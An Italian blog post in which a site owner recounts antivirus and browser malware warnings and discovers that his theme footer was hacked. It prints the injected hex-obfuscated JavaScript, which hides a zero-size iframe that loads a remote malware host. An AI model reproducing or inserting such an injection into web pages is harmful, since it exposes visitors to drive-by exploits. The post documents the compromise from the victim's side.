http://blog.DoZarte.com

E’ da una settimana che, in quel paio di PC/win che uso, ogni tanto mi compare una finestra di allerta di AVG che mi indica:

Threat detected!
File name: mrsdeath.com/forit/index.php
Threat name: Exploit Unique-Sheaf Exploit Pack (type 662)
Process name: firefox.exe
Process ID: 5672

…e io non riesco a capire di cosa si tratta!

Provando a visitare l’indirizzo segnalato, la pagina reindirizza verso l’home page di Google.
Ho controllato i dati del dominio registrati, e risulta il seguente:

Domain Name: MRSDEATH.COM
Creation Date: 15-Apr-2009
Registrant:
Ivan Mihelson
Lenia St 457/520
Minsk, Minskayav Oblasts'(be), 35200

…ed, in effetti, la data di creazione del dominio potrebbe più o meno coincidere con l’inizio delle “apparizioni”.

Poi ho provato a visitare il blog tramite Explorer – di solito uso Firefox – e sono saltati fuori addirittura 2 avvisi di “file minacciosi” provenienti dal sito: Exploit.pdf e JS/Obfuscated
CACCHIO!
Inoltre, sempre su Explorer, ad un certo punto del caricamento della pagina, Explorer mi avvisava che era impossibile continuare; questo mi ha dato una mano ad individuare il problema.

Il footer del mio tema era stato hackerato, con l’aggiunta del seguente codice:

<script type="text/javascript">var _0xcc7a=["\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x67\x6E\x6F\x64\x65\x2E\x63\x6E\x2F\x73\x63\x72\x69\x70\x74\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x32","\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];b=document[_0xcc7a[0x1]](_0xcc7a[0x0])[0x0];i=document[_0xcc7a[0x3]](_0xcc7a[0x2]);i[_0xcc7a[0x6]](_0xcc7a[0x4],_0xcc7a[0x5]);i[_0xcc7a[0x6]](_0xcc7a[0x7],0x0);i[_0xcc7a[0x6]](_0xcc7a[0x8],0x0);i[_0xcc7a[0x6]](_0xcc7a[0x9],0x0);b[_0xcc7a[0xa]](i);</script>

Il bello – cioè: il brutto – è che non riesco a capire di cosa si tratti, e nessun antivirus riesce a darmi una mano in tal senso!

Senza contare che, se prima tentavo di raggiungere il sito tramite Chrome, questo addirittura mi presentava una paginona rossa di allerta:

Attenzione: l'apertura di questo sito potrebbe danneggiare il tuo computer!
Il sito web all'indirizzo www.dozarte.com contiene elementi provenienti dal sito 89.149.194.45 in cui sembra essere presente malware (...)

Quindi ho dovuto anche fare la richiesta di “riconsiderazione” per il mio sito, dopo averlo ripulito.
Il risultato di tutta questa bella storia lo potete vedere nel grafico qui sotto: